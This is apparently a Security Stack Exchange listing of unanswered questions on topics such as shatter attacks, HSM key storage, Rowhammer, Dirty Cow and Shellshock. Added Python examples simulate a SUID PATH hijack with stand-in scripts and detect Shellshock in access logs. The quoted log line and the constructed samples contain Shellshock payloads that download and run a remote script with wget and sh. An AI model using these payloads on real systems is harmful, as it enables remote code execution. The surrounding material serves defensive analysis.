Unanswered Questions
27 votes, 1 answer, 1k views
Are shatter attacks still possible in the days of User Interface Privilege Isolation?
Before Windows introduced User Interface Privilege Isolation, any application could send all kinds of window messages to any window on the same desktop (a shatter attack), allowing elevation of ...
10 votes, 0 answers, 237 views
What are the privacy differences with Azure trustee delegates in China, Germany, and other locations?
Azure has different privacy agreements set up with different datacenters as mentioned in this footnote
Azure is now available in China through a unique partnership between Microsoft and 21Vianet, ...
10 votes, 3 answers, 429 views
Centralized key management for iOS and Android Code Signing
What is the best way for an enterprise to manage code signing certificates? The default seems to be that Apple and Android keys get stored by each developer on their machines.
I see systems like ...
9 votes, 0 answers, 2k views
Nginx and HSM integration to hold private keys
We are using Nginx and storing private keys in a file on the server. We would like to move the private keys to an HSM, so that the SSL keys are stored in the HSM and never leave it. All crypto operations required during ...
8 votes, 0 answers, 187 views
Which memory modules are known to be vulnerable to or secure against Rowhammer/Flip Feng Shui?
Many memory modules from different manufacturers have been tested for vulnerability to the Rowhammer exploit. However, some researchers have anonymised their results, possibly for responsible ...
8 votes, 2 answers, 271 views
SUID Scripts vulnerability
In this article, it says that this C-shell script:
#!/bin/csh -b
set user = $1
passwd $user
With these permissions:
-rwsr-x--- 1 root helpdesk
Is vulnerable because one can manipulate env ...
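A simulation of the environment-manipulation vector, added here as an example; it is not code from the question or from the article it cites. The excerpt is cut off at "manipulate env", so the simulation assumes the vector is PATH: the wrapper runs `passwd` without an absolute path and inherits the caller's environment, so a caller who puts their own directory first on PATH decides which `passwd` the privileged wrapper executes. Nothing here is setuid and no real `passwd` is touched; two stand-in scripts (constructed for the example) play the real binary and the attacker's, so it runs as an ordinary user on any POSIX system with `/bin/sh`.

```python
import os
import subprocess
import tempfile

def make_stand_in(dir_path, name, marker):
    """Write a tiny /bin/sh script named `name` that prints `marker`.
    It stands in for a binary so the demo never runs the real passwd."""
    path = os.path.join(dir_path, name)
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho %s\n" % marker)
    os.chmod(path, 0o755)
    return path

def run_wrapper(command, user, env):
    """Run `command user`, which is what the csh wrapper's `passwd $user` does.
    `env` is the environment the wrapper inherits; with an unqualified command
    the PATH inside it decides which executable is found (Python resolves the
    executable through the child's PATH, as exec*p would)."""
    result = subprocess.run(command + [user], env=env,
                            stdout=subprocess.PIPE, universal_newlines=True,
                            check=True)
    return result.stdout.strip()

def demo(user="alice"):
    """Return (what the vulnerable wrapper ran, what the hardened wrapper ran)."""
    with tempfile.TemporaryDirectory() as tmp:
        real_bin = os.path.join(tmp, "real_bin")      # stands in for /usr/bin
        evil_bin = os.path.join(tmp, "evil_bin")      # attacker-writable dir
        os.mkdir(real_bin)
        os.mkdir(evil_bin)
        real_passwd = make_stand_in(real_bin, "passwd", "REAL_PASSWD")
        make_stand_in(evil_bin, "passwd", "ATTACKER_PASSWD")

        # The caller controls the environment the setuid wrapper inherits.
        attacker_env = {"PATH": evil_bin + os.pathsep + real_bin}

        # Vulnerable shape: unqualified `passwd`, inherited PATH.
        vulnerable = run_wrapper(["passwd"], user, attacker_env)

        # Hardened shape: absolute path to the binary and a PATH reset by the
        # wrapper itself (csh: `set path = (/usr/bin /bin)`), so the caller's
        # environment no longer picks the executable.
        hardened_env = {"PATH": os.pathsep.join(["/usr/bin", "/bin"])}
        hardened = run_wrapper([real_passwd], user, hardened_env)

        return vulnerable, hardened

if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("unqualified passwd + inherited PATH ran:", vulnerable)
    print("absolute path + reset PATH ran:         ", hardened)
```

The first value shows the attacker's `passwd` running in the wrapper's context; the second shows the fix closing that path. Resetting PATH alone is not enough in general (other inherited variables can matter for other interpreters), which is why the hardened call also names the binary absolutely.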
8 votes, 1 answer, 622 views
Hooking into firefox memory
I am trying to learn how to hook into the browser memory. The Frida tool is a good start to this. My goal is to extract the client-random, server-random and symmetric session keys established at the ...
7 votes, 1 answer, 102 views
GSM encryption suppression
The following papers explain that it is possible to suppress the encryption (or downgrade) in GSM using faked messages:
https://pdfs.semanticscholar.org/3a86/4f867aadaea449623ddbf288c18815e7eb00.pdf
...
7 votes, 0 answers, 2k views
Exploiting Dirty Cow using Metasploit
I'm testing on some of my Linux Virtual Machines trying to exploit the Dirty Cow Vulnerability and I'm not able to succeed using Metasploit. First of all... for interested users, a couple of links to "...
7 votes, 0 answers, 171 views
Odd history of OAuth 2 device flow
OAuth 2 device flow has an odd history. It's found in early versions of the RFC, but was then taken out seemingly without an explanation I could find. Recently, a new draft was proposed specifically ...
7 votes, 0 answers, 464 views
Problem in underscore.js with “new Function()” when CSP header is set
In underscore.js, template rendering causes violation of the 'unsafe-eval' property, with CSP error at following line:
render = new Function(settings.variable || 'obj', '_', source);
The solution to ...
7 votes, 1 answer, 1k views
Is there any risk to enabling CORS with a wildcard on S3?
By default, Amazon S3 blocks cross-origin requests. However, it allows users the ability to set up per-bucket CORS policies. It offers fairly elaborate controls for which domains and methods the user ...
7 votes, 1 answer, 106 views
Why would some web applications disable Numpad input?
Some web applications (One popular example is Skrill) don't allow input from Numpad for number <input>.
I've seen some local websites here also follow the same procedure.
The thing is, all of ...
6 votes, 0 answers, 110 views
Why does LUKS use CBC?
I read that LUKS uses 256-bit AES with CBC by default. CBC, of course, has the disadvantages that if you change something in the plain text, you have to change everything that comes after it. In the ...
6 votes, 0 answers, 222 views
Shellshock Exploit evidence - is this a successful attack
I was looking through logs today and noticed the following:
62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /...
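A detector for log lines of the shape quoted above, added here as an example and not part of the question. The sample log lines are constructed for the example (RFC 5737 documentation addresses, a made-up download URL) and only mirror the layout of the asker's line; the parser assumes the standard "combined" access-log format, in which the web server escapes quotes inside the Referer and User-Agent fields as `\"`. It pulls the command that follows the Shellshock trigger (CVE-2014-6271, the `() { :;};` prefix) out of each logged field, collects any URLs the command fetches, and flags whether the request targeted a CGI path, since that is how an HTTP request reached bash in the first place.

```python
import re

# Constructed sample access-log lines (not the asker's log). Lines 1 and 3
# carry the Shellshock trigger in the User-Agent field; line 2 is benign.
SAMPLE_LOG = r'''
203.0.113.7 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.9/x.sh -O /tmp/x.sh; sh /tmp/x.sh\""
198.51.100.4 - - [26/Dec/2016:15:17:01 -0100] "GET /index.html HTTP/1.1" 200 13501 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/50.0"
203.0.113.7 - - [26/Dec/2016:15:18:22 -0100] "GET /cgi-bin/test.cgi HTTP/1.0" 404 292 "-" "() { :;}; echo vulnerable"
'''

# "combined" log format. The quoted fields may contain \" so each one is
# matched as a run of non-quote characters or backslash escapes.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Shellshock trigger: an exported function body "() { ... }" followed by a
# trailing command, which a vulnerable bash ran while importing the variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<payload>.+)$')

def unescape(field):
    """Undo the backslash escaping the web server applied when logging the field."""
    return re.sub(r'\\(.)', r'\1', field)

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    for key in ("request", "referer", "ua"):
        rec[key] = unescape(rec[key])
    return rec

def find_shellshock(rec):
    """Return (field, payload) for the first logged field carrying the trigger."""
    for field in ("ua", "referer", "request"):
        m = SHELLSHOCK_RE.search(rec[field])
        if m:
            return field, m.group("payload").strip()
    return None

def targets_cgi(rec):
    """Heuristic: did the request aim at a CGI path (the usual route to bash)?"""
    parts = rec["request"].split(" ")
    path = parts[1] if len(parts) > 1 else rec["request"]
    return "/cgi-bin/" in path or path.endswith((".cgi", ".sh"))

def scan(log_text):
    """Return one record per line that carries a Shellshock payload."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            continue
        found = find_shellshock(rec)
        if not found:
            continue
        field, payload = found
        hits.append({
            "ip": rec["ip"], "ts": rec["ts"], "request": rec["request"],
            "status": int(rec["status"]), "field": field, "payload": payload,
            "urls": re.findall(r'https?://\S+', payload),   # second-stage fetches
            "cgi_target": targets_cgi(rec),
        })
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["request"], hit["status"], hit["field"],
              "cgi" if hit["cgi_target"] else "static", "->", hit["payload"])
```

The access log proves that the request arrived and what the server answered, not that bash ran the payload: a 200 for `/` is the normal response for a static page whether or not the User-Agent was ever handed to a shell. Execution needed the request to reach a bash-backed handler (typically a CGI script), so the `cgi_target` flag and the server's handler configuration for the requested path are the first things to check, followed by host evidence such as the file the payload writes to `/tmp` and outbound connections to the URLs in `urls`.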